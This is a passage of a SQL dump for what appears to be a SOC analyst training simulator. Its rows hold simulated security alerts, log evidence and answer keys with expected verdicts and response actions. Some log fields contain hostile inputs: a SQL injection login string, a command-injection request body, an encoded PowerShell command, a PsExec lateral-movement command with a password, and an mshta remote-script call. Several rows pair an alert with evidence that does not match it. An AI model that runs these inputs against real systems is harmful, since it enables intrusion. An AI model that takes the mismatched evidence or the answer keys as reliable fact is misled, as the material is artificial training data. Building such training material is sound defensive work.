2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.345Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T05:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"192.168.2.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER\\\",\\\"request_body\\\":\\\"ping -c 4 8.8.8.8 && echo test\\\",\\\"url\\\":\\\"http://192.168.2.20/admin/execute\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(699, 'Suspicious PowerShell Execution with Encoded Commands', 'high', 'CrowdStrike', 'A PowerShell process was detected executing with encoded commands on an internal host. This is frequently used in obfuscation techniques by attackers.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:42:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.20\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"powershell.exe -enc W3Bhd2Vyc2hlbGwuZXhlIC1jb21tYW5kIC1lbmMgU29tZUVuY29kZWRDb21tYW5k\",\"file_hash\":\"3b7b3c2a5c6a4f7b8b8b3a2c3b7c6a4f\"}', '2026-01-10 01:55:09', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3Bhd2Vyc2hlbGwuZXhlIC1jb21tYW5kIC1lbmMgU29tZUVuY29kZWRDb21tYW5k\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used in malicious scripts.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b7b3c2a5c6a4f7b8b8b3a2c3b7c6a4f\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"This hash is associated with potentially unwanted software.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands indicate potential malware execution.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(700, 'Unauthorized Access Attempt via RDP', 'critical', 'Splunk', 'Multiple failed RDP login attempts detected from an external IP address, suggesting a possible brute force attack.', 'Credential Attack', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T13:22:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"RDP-SERVER\",\"failed_attempts\":25}', '2026-01-10 08:37:56', '2026-02-16 18:04:57', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed login attempts from a known malicious IP indicates a brute force attack.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.346Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.346Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.346Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.346Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.346Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:22:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"RDP-SERVER\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(701, 'Suspicious Network Activity Detected', 'medium', 'Firewall', 'A large volume of data was transferred from an internal server to an unknown external IP, potentially indicating data exfiltration.', 'Data Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T16:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"198.51.100.75\",\"bytes_transferred\":10485760,\"hostname\":\"FILE-SERVER\"}', '2026-01-11 09:55:46', '2026-02-18 09:06:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unusual data transfer patterns suggest possible data exfiltration to a known malicious IP.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(702, 'False Positive: Legitimate Script Execution Detected', 'low', 'Wazuh', 'A legitimate administrative script was detected using mshta.exe, which can sometimes be misidentified as malicious.', 'Lateral Movement', 'T1218.005', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"\",\"username\":\"admin_user\",\"hostname\":\"ADMIN-SERVER\",\"command_line\":\"mshta.exe http://internal.domain.com/admin_script.hta\"}', '2026-01-10 21:43:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta.exe http://internal.domain.com/admin_script.hta\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL is a trusted internal domain for administrative purposes.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The script execution was legitimate, originating from a trusted internal source.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.348Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"ADMIN-SERVER\\\",\\\"command_line\\\":\\\"mshta.exe http://internal.domain.com/admin_script.hta\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(703, 'LockBit 3.0 Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon associated with LockBit 3.0 ransomware campaign was detected communicating with a known malicious IP. The beacon exhibited process hollowing tactics.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T03:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"176.32.98.45\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-WS01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\temp.dll,EntryPoint\",\"file_hash\":\"3f8f6c41a65f4b5e3d2e0e5d4b2c6a0f\",\"domain\":\"malicious-domain.com\"}', '2026-01-10 14:55:24', '2026-02-16 18:04:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"176.32.98.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1003 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f8f6c41a65f4b5e3d2e0e5d4b2c6a0f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as LockBit 3.0 ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious hash and IP, along with Cobalt Strike beacon activity, confirms the attack.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(704, 'Suspicious Network Traffic to Fast-Flux DNS Domain', 'high', 'Firewall', 'Network traffic to a domain exhibiting fast-flux characteristics was detected. The domain is known to be associated with the BlackCat/ALPHV ransomware group.', 'Command and Control', 'T1071', 1, 'investigating', 296, '{\"timestamp\":\"2026-01-11T08:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.120\",\"domain\":\"fluxy-malicious.com\"}', '2026-01-10 21:54:13', '2026-03-14 21:30:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"fluxy-malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with fast-flux and BlackCat C2 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected client\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The fast-flux domain and known association with ransomware C2 activity confirm the threat.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(705, 'False Positive: Suspected Phishing from Internal Domain', 'medium', 'Proofpoint', 'An email flagged as phishing due to a similar domain name was found to be sent from a legitimate internal source. The email appeared suspicious due to its subject line and formatting.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.100\",\"email_sender\":\"alerts@internal-domain.com\",\"subject\":\"Urgent: Update Your Password Immediately\",\"url\":\"https://internal-domain.com/security-update\"}', '2026-01-10 05:58:44', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@internal-domain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate email from internal domain\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://internal-domain.com/security-update\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified internal URL\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a legitimate internal source and was incorrectly flagged due to its subject and formatting.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"False Positive: Suspected Phishing from Internal Domain\",\"date\":\"2026-02-01T20:32:22.351Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(706, 'APT Lateral Movement via PsExec Detected', 'high', 'Wazuh', 'An APT actor was detected using PsExec for lateral movement within the network, targeting several internal hosts over SMB.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T06:30:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"C:\\\\tools\\\\PsExec.exe \\\\\\\\10.0.0.25 -u admin_user -p password cmd\"}', '2026-01-11 08:30:21', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP address of the initiating host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Target IP address of the lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\tools\\\\PsExec.exe \\\\\\\\10.0.0.25 -u admin_user -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec usage detected, often used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Use of PsExec for lateral movement is a known tactic of APT groups, confirming the suspicious activity.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.351Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T06:30:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\tools\\\\\\\\PsExec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin_user -p password cmd\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
